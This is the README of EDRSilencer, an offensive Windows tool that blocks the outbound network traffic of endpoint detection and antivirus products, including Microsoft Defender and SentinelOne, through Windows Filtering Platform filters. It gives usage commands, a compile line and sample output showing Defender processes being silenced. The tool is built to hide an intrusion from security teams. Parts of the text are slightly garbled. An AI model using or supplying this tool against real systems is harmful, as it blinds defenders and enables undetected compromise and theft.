

Cylance

Elastic EDR

Trellix EDR

Qualys EDR

SentinelOne

Microsoft Defender for Endpoint and Microsoft Defender Antivirus

- Carbon Black EDR
- Carbon Black Cloud
- Tanium
- Palo Alto Networks Traps/Cortex XDR
- FortiEDR
- Cisco Secure Endpoint (Formerly Cisco AMP)
- ESET Inspect
- Harfanglab EDR
- TrendMicro Apex One

As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in EDRSilencer.c) prove insufficient in blocking all alert, detection, or event forward traffic.

Testing Environment

Tested in Windows 10 and Windows Server 2016

Usage

Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>



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- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all EDRSilencer.exe blockedr
- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a s_| EDRSilencer.exe block "C:\Windows\System32\curl.exe"
- Remove all WFP filters applied by this tool: EDRSilencer.exe unblockall
- Remove a specific WFP filter based on filter id: EDRSilencer.exe unblock <filter id>

Compile

x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfw 🖵

Example

EDRSilencer.exe blockedr

Detect and block the outbound traffic of running EDR processes

\Tool>EDRSilencer.exe blockedr

tected running EDR process: MsSense.exe (3272):

Added WFP filter for "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" (Filter id: 128432, IPv4 layer).

Added WFP filter for "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" (Filter id: 128433, IPv6 layer).

tected running EDR process: MsMpEng.exe (5596):

Added WFP filter for "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\MsMpEng.exe" (Filter id: 128434, IPv4 layer).

Added WFP filter for "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\MsMpEng.exe" (Filter id: 128435, IPv6 layer).

Credits

https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/